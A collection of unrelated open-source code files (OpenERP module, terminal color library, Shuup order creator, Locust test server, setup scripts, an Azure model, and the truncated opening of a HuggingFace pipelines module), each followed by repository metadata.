hivam/doctor_psychology | models/doctor_hc_report_psicologia_inherit.py | 1 | 1378 | # -*- encoding: utf-8 -*-
# #############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
import logging
_logger = logging.getLogger(__name__)
import base64
import sys, os
class doctor_hc_report_inherit(osv.osv):
_inherit = "doctor.list_report"
_columns = {
'attentions_psychology_ids': fields.one2many('doctor.psicologia', 'list_report_print_spicologia_id', 'Attentions'),
}
doctor_hc_report_inherit()
| agpl-3.0 | -6,713,229,931,846,211,000 | 36.243243 | 117 | 0.640058 | false |
groboclown/whimbrel | installer/whimbrel/install/util/termcolor.py | 1 | 8654 | """
A Windows and ANSI coloring library.
"""
from sys import stdout
__ALL__ = ['out', 'outln']
VERSION = (1, 0, 0)
try:
# Colors text in console mode application (win32).
# Uses ctypes and Win32 methods SetConsoleTextAttribute and
# GetConsoleScreenBufferInfo.
#
# source: https://www.burgaud.com/bring-colors-to-the-windows-console-with-python/
#
# $Id: color_console.py 534 2009-05-10 04:00:59Z andre $
from ctypes import windll, Structure, c_short, c_ushort, byref
SHORT = c_short
WORD = c_ushort
class COORD(Structure):
"""struct in wincon.h."""
_fields_ = [
("X", SHORT),
("Y", SHORT)
]
class SMALL_RECT(Structure):
"""struct in wincon.h."""
_fields_ = [
("Left", SHORT),
("Top", SHORT),
("Right", SHORT),
("Bottom", SHORT)
]
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
"""struct in wincon.h."""
_fields_ = [
("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", WORD),
("srWindow", SMALL_RECT),
("dwMaximumWindowSize", COORD)
]
# winbase.h
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h
FOREGROUND_BLACK = 0x0000
FOREGROUND_BLUE = 0x0001
FOREGROUND_GREEN = 0x0002
FOREGROUND_CYAN = 0x0003
FOREGROUND_RED = 0x0004
FOREGROUND_MAGENTA = 0x0005
FOREGROUND_YELLOW = 0x0006
FOREGROUND_GREY = 0x0007
FOREGROUND_INTENSITY = 0x0008 # foreground color is intensified.
BACKGROUND_BLACK = 0x0000
BACKGROUND_BLUE = 0x0010
BACKGROUND_GREEN = 0x0020
BACKGROUND_CYAN = 0x0030
BACKGROUND_RED = 0x0040
BACKGROUND_MAGENTA = 0x0050
BACKGROUND_YELLOW = 0x0060
BACKGROUND_GREY = 0x0070
BACKGROUND_INTENSITY = 0x0080 # background color is intensified.
stdout_handle = windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
def get_text_attr():
"""Returns the character attributes (colors) of the console screen
buffer."""
csbi = CONSOLE_SCREEN_BUFFER_INFO()
GetConsoleScreenBufferInfo(stdout_handle, byref(csbi))
return csbi.wAttributes
def set_text_attr(color):
"""Sets the character attributes (colors) of the console screen
buffer. Color is a combination of foreground and background color,
foreground and background intensity."""
SetConsoleTextAttribute(stdout_handle, color)
HIGHLIGHTS = {
'on_grey': BACKGROUND_GREY,
'on_red': BACKGROUND_RED,
'on_green': BACKGROUND_GREEN,
'on_yellow': BACKGROUND_YELLOW,
'on_blue': BACKGROUND_BLUE,
'on_magenta': BACKGROUND_MAGENTA,
'on_cyan': BACKGROUND_CYAN,
'on_black': BACKGROUND_BLACK
}
BOLD = FOREGROUND_INTENSITY
COLORS = {
'grey': FOREGROUND_GREY,
'red': FOREGROUND_RED,
'green': FOREGROUND_GREEN,
'yellow': FOREGROUND_YELLOW,
'blue': FOREGROUND_BLUE,
'magenta': FOREGROUND_MAGENTA,
'cyan': FOREGROUND_CYAN,
'black': FOREGROUND_BLACK,
}
DEFAULT_COLORS = get_text_attr()
DEFAULT_BACKGROUND = DEFAULT_COLORS & 0x00f0
DEFAULT_FOREGROUND = DEFAULT_COLORS & 0x000f
def set_color(val):
assert isinstance(val, int)
set_text_attr(val)
def set_default_colors():
set_color(DEFAULT_COLORS)
def colored(text, color=None, on_color=None, attrs=None):
color_index = 0
if color not in COLORS:
color_index |= DEFAULT_FOREGROUND
else:
color_index |= COLORS[color]
if on_color not in HIGHLIGHTS:
color_index |= DEFAULT_BACKGROUND
else:
color_index |= HIGHLIGHTS[on_color]
if attrs is not None:
for attr in attrs:
if attr == 'bold':
color_index |= BOLD
return str(text), color_index
def out(*text):
if isinstance(text, str):
set_default_colors()
stdout.write(text)
return
for c in text:
if isinstance(c, str):
set_default_colors()
stdout.write(c)
else:
assert isinstance(c, tuple) or isinstance(c, list)
assert len(c) == 2
assert isinstance(c[0], str)
assert isinstance(c[1], int)
set_color(c[1])
stdout.write(c[0])
set_default_colors()
except ImportError:
# from the great "termcolor.py" library.
# Copyright (c) 2008-2011 Volvox Development Team
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Author: Konstantin Lepa <[email protected]>
import os
ATTRIBUTES = dict(
list(zip([
'bold',
'dark',
'',
'underline',
'blink',
'',
'reverse',
'concealed'
],
list(range(1, 9))
))
)
del ATTRIBUTES['']
HIGHLIGHTS = dict(
list(zip([
'on_black',
'on_red',
'on_green',
'on_yellow',
'on_blue',
'on_magenta',
'on_cyan',
'on_grey'
],
list(range(40, 48))
))
)
COLORS = dict(
list(zip([
'black',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'grey',
],
list(range(30, 38))
))
)
RESET = '\033[0m'
def colored(text, color=None, on_color=None, attrs=None):
"""Colorize text.
        Available text colors:
            grey, red, green, yellow, blue, magenta, cyan, black.
        Available text highlights:
            on_grey, on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan, on_black.
        Available attributes:
            bold, dark, underline, blink, reverse, concealed.
        Example:
            colored('Hello, World!', 'red', 'on_grey', ['bold', 'blink'])
colored('Hello, World!', 'green')
:param text: text to format in the requested color
:param color: font color
:param on_color: background color
:param attrs: additional font attributes
"""
if os.getenv('ANSI_COLORS_DISABLED') is None:
fmt_str = '\033[%dm%s'
if color is not None:
text = fmt_str % (COLORS[color], text)
if on_color is not None:
text = fmt_str % (HIGHLIGHTS[on_color], text)
if attrs is not None:
for attr in attrs:
text = fmt_str % (ATTRIBUTES[attr], text)
text += RESET
return text
def out(*text):
if isinstance(text, str):
stdout.write(text)
else:
for c in text:
stdout.write(str(c))
stdout.flush()
def outln(*text):
    out(*text)
    stdout.write("\n")
| apache-2.0 | 5,236,865,429,722,387,000 | 28.435374 | 86 | 0.547608 | false |
JohnDMcMaster/uvscada | nuc/gscsv.py | 1 | 1553 | #!/usr/bin/env python
import time
import argparse
import json
from uvscada.nuc import pulser
from uvscada.nuc import alsa_util
def cap(jf):
def jput(j):
jf.write(json.dumps(j, sort_keys=True) + '\n')
print 'Configuring ALSA'
asrc = alsa_util.ALSASrc()
print 'looping'
# 400 w/o, 7300 w/ Cs-137 (1 uCi)
psr = pulser.PHA(phi=200, plo=50)
agen = asrc.gen()
stat = pulser.PulserStat(tprint=args.tprint)
t0 = time.time()
while True:
sample = agen.next()
pulse = psr.next(sample)
stat.next(sample, pulse)
if pulse:
jput({'t': time.time(), 'n': stat.pulses, 'v': pulse})
if args.verbose:
print '% 6d: % 5.1f' % (stat.pulses, pulse)
if args.time and time.time() - t0 > args.time:
print 'Break on time'
break
if args.number and stat.pulses > args.number:
print 'Break on pulses'
break
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Replay captured USB packets')
parser.add_argument('--verbose', '-v', action='store_true', help='verbose')
parser.add_argument('--tprint', '-p', type=int, default=3, help='Print interval')
parser.add_argument('--time', '-t', type=int, default=0, help='Help')
parser.add_argument('--number', '-n', type=int, default=0, help='Help')
parser.add_argument('fn', nargs='?', default='out.jl', help='csv out')
args = parser.parse_args()
cap(open(args.fn, 'w'))
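

# Illustrative helper (not part of the original script): load the JSON-lines
# output written by cap() -- one {'t': ..., 'n': ..., 'v': ...} record per pulse.
def read_pulses(fn='out.jl'):
    with open(fn) as read_file:
        return [json.loads(line) for line in read_file if line.strip()]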
| bsd-2-clause | -2,728,910,544,904,184,000 | 28.865385 | 85 | 0.576304 | false |
davivcgarcia/python-dcc-ufrj | Exercicios - Lista Paulo Roma/Lista 1/ex4.py | 1 | 1158 | #! /usr/bin/env python
# coding: utf-8
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author: Davi Vercillo C. Garcia
# Date: 24/01/2009
# Purpose: Check whether a word is a palindrome.
#
def main():
palavra = raw_input("Insira uma palavra: ")
palavra = list(palavra)
palavra_ao_contrario = palavra + []
palavra_ao_contrario.reverse()
if palavra == palavra_ao_contrario:
print "É palíndromo !"
else:
print "Não é palíndromo !"
return 0
if __name__ == "__main__":
main()
| gpl-3.0 | -2,848,325,380,548,143,600 | 30.972222 | 74 | 0.677672 | false |
suutari/shoop | shuup/admin/modules/orders/json_order_creator.py | 1 | 15127 | # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from copy import deepcopy
from django import forms
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.utils.translation import ugettext as _
from shuup.core.models import (
CompanyContact, Contact, MutableAddress, OrderLineType, OrderStatus,
PaymentMethod, PersonContact, Product, ShippingMethod, Shop
)
from shuup.core.order_creator import OrderCreator, OrderModifier, OrderSource
from shuup.core.order_creator._source import LineSource
from shuup.utils.analog import LogEntryKind
from shuup.utils.numbers import nickel_round, parse_decimal_string
class AdminOrderSource(OrderSource):
def get_validation_errors(self):
return []
def is_cash_order(self):
return (self.payment_method and self.payment_method.choice_identifier == "cash")
class AdminOrderCreator(OrderCreator):
def _check_orderability(self, order_line):
return
class AdminOrderModifier(OrderModifier):
def _check_orderability(self, order_line):
return
class JsonOrderCreator(object):
def __init__(self):
self._errors = []
@staticmethod
def safe_get_first(model, **lookup):
# A little helper function to clean up the code below.
return model.objects.filter(**lookup).first()
def add_error(self, error):
self._errors.append(error)
@property
def is_valid(self):
return not self._errors
@property
def errors(self):
return tuple(self._errors)
def _process_line_quantity_and_price(self, source, sline, sl_kwargs):
quantity_val = sline.pop("quantity", None)
try:
sl_kwargs["quantity"] = parse_decimal_string(quantity_val)
except Exception as exc:
msg = _("The quantity '%(quantity)s' (for line %(text)s) is invalid (%(error)s)") % {
"text": sl_kwargs["text"],
"quantity": quantity_val,
"error": exc,
}
self.add_error(ValidationError(msg, code="invalid_quantity"))
return False
is_product = bool(sline.get("type") == "product")
price_val = sline.pop("baseUnitPrice", None) if is_product else sline.pop("unitPrice", None)
try:
sl_kwargs["base_unit_price"] = source.create_price(parse_decimal_string(price_val))
except Exception as exc:
msg = _("The price '%(price)s' (for line %(text)s) is invalid (%(error)s)") % {
"text": sl_kwargs["text"],
"price": price_val,
"error": exc
}
self.add_error(ValidationError(msg, code="invalid_price"))
return False
discount_val = sline.pop("discountAmount", parse_decimal_string(str("0.00")))
try:
sl_kwargs["discount_amount"] = source.create_price(parse_decimal_string(discount_val))
except Exception as exc:
msg = _("The discount '%(discount)s' (for line %(text)s is invalid (%(error)s)") % {
"discount": discount_val,
"text": sl_kwargs["text"],
"error": exc
}
self.add_error(ValidationError(msg, code="invalid_discount"))
return True
def _process_product_line(self, source, sline, sl_kwargs):
product_info = sline.pop("product", None)
if not product_info:
self.add_error(ValidationError(_("Product line does not have a product set."), code="no_product"))
return False
product = self.safe_get_first(Product, pk=product_info["id"])
if not product:
self.add_error(ValidationError(_("Product %s does not exist.") % product_info["id"], code="no_product"))
return False
try:
shop_product = product.get_shop_instance(source.shop)
except ObjectDoesNotExist:
self.add_error(ValidationError((_("Product %(product)s is not available in the %(shop)s shop.") % {
"product": product,
"shop": source.shop
}), code="no_shop_product"))
return False
supplier = shop_product.suppliers.first() # TODO: Allow setting a supplier?
sl_kwargs["product"] = product
sl_kwargs["supplier"] = supplier
sl_kwargs["type"] = OrderLineType.PRODUCT
sl_kwargs["sku"] = product.sku
sl_kwargs["text"] = product.name
return True
def _add_json_line_to_source(self, source, sline):
valid = True
type = sline.get("type")
sl_kwargs = dict(
line_id=sline.pop("id"),
sku=sline.pop("sku", None),
text=sline.pop("text", None),
shop=source.shop,
type=OrderLineType.OTHER # Overridden in the `product` branch
)
if type != "text":
if not self._process_line_quantity_and_price(source, sline, sl_kwargs):
valid = False
if type == "product":
if not self._process_product_line(source, sline, sl_kwargs):
valid = False
if valid:
source.add_line(**sl_kwargs)
def _process_lines(self, source, state):
state_lines = state.pop("lines", [])
if not state_lines:
self.add_error(ValidationError(_("Please add lines to the order."), code="no_lines"))
for sline in state_lines:
try:
self._add_json_line_to_source(source, sline)
except Exception as exc: # pragma: no cover
self.add_error(exc)
def _create_contact_from_address(self, billing_address, is_company):
name = billing_address.get("name", None)
phone = billing_address.get("phone", "")
email = billing_address.get("email", "")
fields = {"name": name, "phone": phone, "email": email}
if is_company:
tax_number = billing_address.get("tax_number", None)
fields.update({"tax_number": tax_number})
customer = CompanyContact(**fields)
else:
customer = PersonContact(**fields)
return customer
def _get_address(self, address, is_company, save):
address_form = forms.modelform_factory(MutableAddress, exclude=[])
address_form_instance = address_form(data=address)
address_form_instance.full_clean()
if not address_form_instance.is_valid():
for field_name, errors in address_form_instance.errors.items():
field_label = address_form_instance.fields[field_name].label
for error_msg in errors:
self.add_error(
ValidationError(
"%(field_label)s: %(error_msg)s",
params={"field_label": field_label, "error_msg": error_msg},
code="invalid_address"
)
)
return None
if is_company and not address_form_instance.cleaned_data["tax_number"]:
self.add_error(ValidationError(_("Tax number is not set for company."), code="no_tax_number"))
return None
if save:
return address_form_instance.save()
return MutableAddress.from_data(address_form_instance.cleaned_data)
def _initialize_source_from_state(self, state, creator, ip_address, save, order_to_update=None):
shop_data = state.pop("shop", None).get("selected", {})
shop = self.safe_get_first(Shop, pk=shop_data.pop("id", None))
if not shop:
self.add_error(ValidationError(_("Please choose a valid shop."), code="no_shop"))
return None
source = AdminOrderSource(shop=shop)
if order_to_update:
source.update_from_order(order_to_update)
customer_data = state.pop("customer", None)
billing_address_data = customer_data.pop("billingAddress", {})
shipping_address_data = (
billing_address_data
if customer_data.pop("shipToBillingAddress", False)
else customer_data.pop("shippingAddress", {}))
is_company = customer_data.pop("isCompany", False)
save_address = customer_data.pop("saveAddress", False)
billing_address = self._get_address(billing_address_data, is_company, save)
if self.errors:
return
shipping_address = self._get_address(shipping_address_data, is_company, save)
if self.errors:
return
customer = self._get_customer(customer_data, billing_address_data, is_company, save)
if not customer:
return
if save and save_address:
customer.default_billing_address = billing_address
customer.default_shipping_address = shipping_address
customer.save()
methods_data = state.pop("methods", None) or {}
        shipping_method = methods_data.pop("shippingMethod", None)
if not shipping_method:
self.add_error(ValidationError(_("Please select shipping method."), code="no_shipping_method"))
        payment_method = methods_data.pop("paymentMethod", None)
if not payment_method:
self.add_error(ValidationError(_("Please select payment method."), code="no_payment_method"))
if self.errors:
return
source.update(
creator=creator,
ip_address=ip_address,
customer=customer,
billing_address=billing_address,
shipping_address=shipping_address,
status=OrderStatus.objects.get_default_initial(),
shipping_method=self.safe_get_first(ShippingMethod, pk=shipping_method.get("id")),
payment_method=self.safe_get_first(PaymentMethod, pk=payment_method.get("id")),
)
return source
def _get_customer(self, customer_data, billing_address_data, is_company, save):
pk = customer_data.get("id")
customer = self.safe_get_first(Contact, pk=pk) if customer_data and pk else None
if not customer:
customer = self._create_contact_from_address(billing_address_data, is_company)
if not customer:
return
if save:
customer.save()
return customer
def _postprocess_order(self, order, state):
comment = (state.pop("comment", None) or "")
if comment:
order.add_log_entry(comment, kind=LogEntryKind.NOTE, user=order.creator)
def create_source_from_state(self, state, creator=None, ip_address=None, save=False, order_to_update=None):
"""
Create an order source from a state dict unserialized from JSON.
:param state: State dictionary
:type state: dict
:param creator: Creator user
:type creator: django.contrib.auth.models.User|None
:param save: Flag whether order customer and addresses is saved to database
:type save: boolean
:param order_to_update: Order object to edit
:type order_to_update: shuup.core.models.Order|None
:return: The created order source, or None if something failed along the way
:rtype: OrderSource|None
"""
if not self.is_valid: # pragma: no cover
raise ValueError("Create a new JsonOrderCreator for each order.")
# We'll be mutating the state to make it easier to track we've done everything,
# so it's nice to deepcopy things first.
state = deepcopy(state)
# First, initialize an OrderSource.
source = self._initialize_source_from_state(
state, creator=creator, ip_address=ip_address, save=save, order_to_update=order_to_update)
if not source:
return None
# Then, copy some lines into it.
self._process_lines(source, state)
if not self.is_valid: # If we encountered any errors thus far, don't bother going forward
return None
if not self.is_valid:
return None
if order_to_update:
for code in order_to_update.codes:
source.add_code(code)
if source.is_cash_order():
processor = source.payment_method.payment_processor
taxful_total = source.taxful_total_price
rounded = nickel_round(
taxful_total, quant=processor.rounding_quantize, rounding=processor.rounding_mode.value)
remainder = rounded - taxful_total
line_data = dict(
line_id="rounding",
type=OrderLineType.ROUNDING,
quantity=1,
shop=source.shop,
text="Rounding",
base_unit_price=source.create_price(remainder.value),
tax_class=None,
line_source=LineSource.ADMIN
)
source.add_line(**line_data)
source.get_final_lines()
return source
def create_order_from_state(self, state, creator=None, ip_address=None):
"""
Create an order from a state dict unserialized from JSON.
:param state: State dictionary
:type state: dict
:param creator: Creator user
:type creator: django.contrib.auth.models.User|None
:param ip_address: Remote IP address (IPv4 or IPv6)
:type ip_address: str
:return: The created order, or None if something failed along the way
:rtype: Order|None
"""
source = self.create_source_from_state(
state, creator=creator, ip_address=ip_address, save=True)
# Then create an OrderCreator and try to get things done!
creator = AdminOrderCreator()
try:
order = creator.create_order(order_source=source)
self._postprocess_order(order, state)
return order
except Exception as exc: # pragma: no cover
self.add_error(exc)
return
def update_order_from_state(self, state, order_to_update, modified_by=None):
"""
Update an order from a state dict unserialized from JSON.
:param state: State dictionary
:type state: dict
:param order_to_update: Order object to edit
:type order_to_update: shuup.core.models.Order
:return: The created order, or None if something failed along the way
:rtype: Order|None
"""
source = self.create_source_from_state(state, order_to_update=order_to_update, save=True)
if source:
source.modified_by = modified_by
modifier = AdminOrderModifier()
try:
order = modifier.update_order_from_source(order_source=source, order=order_to_update)
self._postprocess_order(order, state)
return order
except Exception as exc:
self.add_error(exc)
return
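

# Illustrative only: a minimal ``state`` dict of the shape the methods above
# consume, reconstructed from the keys they pop. Every id and address value here
# is a placeholder, not data from any real shop.
EXAMPLE_ORDER_STATE = {
    "shop": {"selected": {"id": 1}},
    "customer": {
        "id": None,
        "isCompany": False,
        "saveAddress": False,
        "shipToBillingAddress": True,
        "billingAddress": {
            "name": "Jane Doe",
            "street": "Example Street 1",
            "city": "Example City",
            "country": "US",
        },
    },
    "methods": {
        "shippingMethod": {"id": 1},
        "paymentMethod": {"id": 1},
    },
    "lines": [
        {
            "id": "line1",
            "type": "product",
            "product": {"id": 1},
            "quantity": "1",
            "baseUnitPrice": "10.00",
            "discountAmount": "0.00",
        },
    ],
    "comment": "",
}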
| agpl-3.0 | -941,524,889,362,125,800 | 38.703412 | 116 | 0.601111 | false |
pyrocko/pyrocko | src/ext/pyavl-1.12/setup.py | 1 | 2116 | # http://pyrocko.org - GPLv3
#
# The Pyrocko Developers, 21st Century
# ---|P------/S----------~Lg----------
# file: setup.py
from distutils.core import setup, Extension
import sys
__VERSION__ = "1.12_1"
laius = """This small C package is comprised of an independent set of
routines dedicated to manipulating AVL trees (files avl.c, avl.h), and of
an extension module for Python that builds upon it (file avlmodule.c) to
provide objects of type 'avl_tree' in Python, which can behave as sorted
containers or sequential lists. For example one can take slices of trees
with the usual syntax. Unlike collectionsmodule.c, avlmodule.c contains
only bindings to the underlying implementation."""
_author = "Richard McGraw"
_authoremail = "dasnar at fastmail dot fm"
_maintainer = _author
_maintaineremail = _authoremail
link_args = []
if sys.platform != 'sunos5':
link_args.append("-Wl,-x") # -x flag not available on Solaris
# from Distutils doc:
# patch distutils if it can't cope with "classifiers" or
# "download_url" keywords
if sys.version < '2.2.3':
from distutils.dist import DistributionMetadata
DistributionMetadata.classifiers = None
DistributionMetadata.download_url = None
ext_avl = Extension(
"avl",
sources=["avl.c", "avlmodule.c"],
define_macros=[('HAVE_AVL_VERIFY', None), ('AVL_FOR_PYTHON', None)],
extra_compile_args=["-Wno-parentheses", "-Wno-uninitialized"],
extra_link_args=link_args
)
setup(
name="pyavl",
version=__VERSION__,
description="avl-tree type for Python (C-written extension module)",
url="http://dasnar.sdf-eu.org/miscres.html",
download_url="http://sourceforge.net/projects/pyavl/",
author=_author,
author_email=_authoremail,
maintainer=_maintainer,
license="None, public domain",
ext_modules=[ext_avl],
classifiers=[
'Intended Audience :: Developers',
'License :: Public Domain',
'Programming Language :: C',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules'
],
long_description=laius
)
| gpl-3.0 | -1,963,531,965,556,900,400 | 32.0625 | 73 | 0.68242 | false |
locustio/locust | locust/test/testcases.py | 1 | 5818 | import base64
import logging
import random
import sys
import unittest
import warnings
from io import BytesIO
import gevent
import gevent.pywsgi
from flask import Flask, Response, make_response, redirect, request, send_file, stream_with_context
import locust
from locust import log
from locust.event import Events
from locust.env import Environment
from locust.test.mock_logging import MockedLoggingHandler
from locust.test.util import clear_all_functools_lru_cache
app = Flask(__name__)
app.jinja_env.add_extension("jinja2.ext.do")
@app.route("/ultra_fast")
def ultra_fast():
return "This is an ultra fast response"
@app.route("/fast")
def fast():
gevent.sleep(random.choice([0.1, 0.2, 0.3]))
return "This is a fast response"
@app.route("/slow")
def slow():
delay = request.args.get("delay")
if delay:
gevent.sleep(float(delay))
else:
gevent.sleep(random.choice([0.5, 1, 1.5]))
return "This is a slow response"
@app.route("/consistent")
def consistent():
gevent.sleep(0.2)
return "This is a consistent response"
@app.route("/request_method", methods=["POST", "GET", "HEAD", "PUT", "DELETE", "PATCH"])
def request_method():
return request.method
@app.route("/request_header_test")
def request_header_test():
return request.headers["X-Header-Test"]
@app.route("/post", methods=["POST"])
@app.route("/put", methods=["PUT"])
def manipulate():
return str(request.form.get("arg", ""))
@app.route("/get_arg", methods=["GET"])
def get_arg():
return request.args.get("arg")
@app.route("/fail")
def failed_request():
return "This response failed", 500
@app.route("/status/204")
def status_204():
return "", 204
@app.route("/redirect", methods=["GET", "POST"])
def do_redirect():
delay = request.args.get("delay")
if delay:
gevent.sleep(float(delay))
url = request.args.get("url", "/ultra_fast")
return redirect(url)
@app.route("/basic_auth")
def basic_auth():
auth = base64.b64decode(request.headers.get("Authorization", "").replace("Basic ", "")).decode("utf-8")
if auth == "locust:menace":
return "Authorized"
resp = make_response("401 Authorization Required", 401)
resp.headers["WWW-Authenticate"] = 'Basic realm="Locust"'
return resp
@app.route("/no_content_length")
def no_content_length():
r = send_file(
BytesIO("This response does not have content-length in the header".encode("utf-8")),
etag=False,
mimetype="text/plain",
)
r.headers.remove("Content-Length")
return r
@app.errorhandler(404)
def not_found(error):
return "Not Found", 404
@app.route("/streaming/<int:iterations>")
def streaming_response(iterations):
import time
def generate():
yield "<html><body><h1>streaming response</h1>"
for i in range(iterations):
yield "<span>%s</span>\n" % i
time.sleep(0.01)
yield "</body></html>"
return Response(stream_with_context(generate()), mimetype="text/html")
@app.route("/set_cookie", methods=["POST"])
def set_cookie():
response = make_response("ok")
response.set_cookie(request.args.get("name"), request.args.get("value"))
return response
@app.route("/get_cookie")
def get_cookie():
return make_response(request.cookies.get(request.args.get("name"), ""))
class LocustTestCase(unittest.TestCase):
"""
Test case class that restores locust.events.EventHook listeners on tearDown, so that it is
safe to register any custom event handlers within the test.
"""
def setUp(self):
# Prevent args passed to test runner from being passed to Locust
del sys.argv[1:]
locust.events = Events()
self.environment = Environment(events=locust.events, catch_exceptions=False)
self.runner = self.environment.create_local_runner()
# When running the tests in Python 3 we get warnings about unclosed sockets.
# This causes tests that depends on calls to sys.stderr to fail, so we'll
# suppress those warnings. For more info see:
# https://github.com/requests/requests/issues/1882
try:
warnings.filterwarnings(action="ignore", message="unclosed <socket object", category=ResourceWarning)
except NameError:
# ResourceWarning doesn't exist in Python 2, but since the warning only appears
# on Python 3 we don't need to mock it. Instead we can happily ignore the exception
pass
# set up mocked logging handler
self._logger_class = MockedLoggingHandler()
self._logger_class.setLevel(logging.INFO)
self._root_log_handlers = [h for h in logging.root.handlers]
[logging.root.removeHandler(h) for h in logging.root.handlers]
logging.root.addHandler(self._logger_class)
logging.root.setLevel(logging.INFO)
self.mocked_log = MockedLoggingHandler
# set unhandled exception flag to False
log.unhandled_greenlet_exception = False
def tearDown(self):
# restore logging class
logging.root.removeHandler(self._logger_class)
[logging.root.addHandler(h) for h in self._root_log_handlers]
self.mocked_log.reset()
clear_all_functools_lru_cache()
class WebserverTestCase(LocustTestCase):
"""
Test case class that sets up an HTTP server which can be used within the tests
"""
def setUp(self):
super().setUp()
self._web_server = gevent.pywsgi.WSGIServer(("127.0.0.1", 0), app, log=None)
gevent.spawn(lambda: self._web_server.serve_forever())
gevent.sleep(0.01)
self.port = self._web_server.server_port
def tearDown(self):
super().tearDown()
self._web_server.stop_accepting()
self._web_server.stop()
| mit | 1,859,846,979,491,025,200 | 27.519608 | 113 | 0.660021 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-servicebus/azure/mgmt/servicebus/models/check_name_availability.py | 1 | 1132 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CheckNameAvailability(Model):
"""Description of a Check Name availability request properties.
    :param name: The name to check for namespace availability. The namespace
    name can contain only letters, numbers, and hyphens. The namespace must
    start with a letter, and it must end with a letter or number.
:type name: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
}
def __init__(self, name):
super(CheckNameAvailability, self).__init__()
self.name = name
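# Illustrative sketch (not part of the generated client; the namespace name
# below is a made-up example): the request model simply wraps the candidate
# name that is posted to the CheckNameAvailability operation.
def _example_check_name_availability_payload():
    candidate = CheckNameAvailability(name="contoso-example-namespace")
    return candidate.name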
| mit | 7,672,745,851,029,361,000 | 31.342857 | 76 | 0.583922 | false |
huggingface/transformers | src/transformers/pipelines/base.py | 1 | 30282 | # coding=utf-8
# Copyright 2018 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import importlib
import json
import os
import pickle
import sys
import warnings
from abc import ABC, abstractmethod
from contextlib import contextmanager
from os.path import abspath, exists
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union
from ..feature_extraction_utils import PreTrainedFeatureExtractor
from ..file_utils import add_end_docstrings, is_tf_available, is_torch_available
from ..modelcard import ModelCard
from ..models.auto.configuration_auto import AutoConfig
from ..tokenization_utils import PreTrainedTokenizer, TruncationStrategy
from ..utils import logging
if is_tf_available():
import tensorflow as tf
from ..models.auto.modeling_tf_auto import TFAutoModel
if is_torch_available():
import torch
from ..models.auto.modeling_auto import AutoModel
if TYPE_CHECKING:
from ..modeling_tf_utils import TFPreTrainedModel
from ..modeling_utils import PreTrainedModel
logger = logging.get_logger(__name__)
def infer_framework_load_model(
model,
config: AutoConfig,
model_classes: Optional[Dict[str, Tuple[type]]] = None,
task: Optional[str] = None,
framework: Optional[str] = None,
**model_kwargs
):
"""
